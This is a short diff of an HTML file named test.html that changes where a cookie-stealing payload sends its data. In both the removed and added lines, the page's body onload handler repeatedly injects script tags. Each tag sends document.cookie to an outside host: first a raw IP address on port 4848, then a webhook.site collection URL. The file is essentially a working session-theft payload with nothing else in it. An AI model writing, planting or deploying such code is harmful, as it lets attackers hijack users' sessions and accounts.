--- a/test.html
+++ b/test.html
@@ -1,4 +1,4 @@
 <!DOCTYPE html>
 <html>
-<body onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//128.199.85.114:4848/?"+document.cookie}></body>
+<body onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//webhook.site/e0c8393e-1841-4adc-b201-c3560eaae60f?"+document.cookie}></body>
 </html>
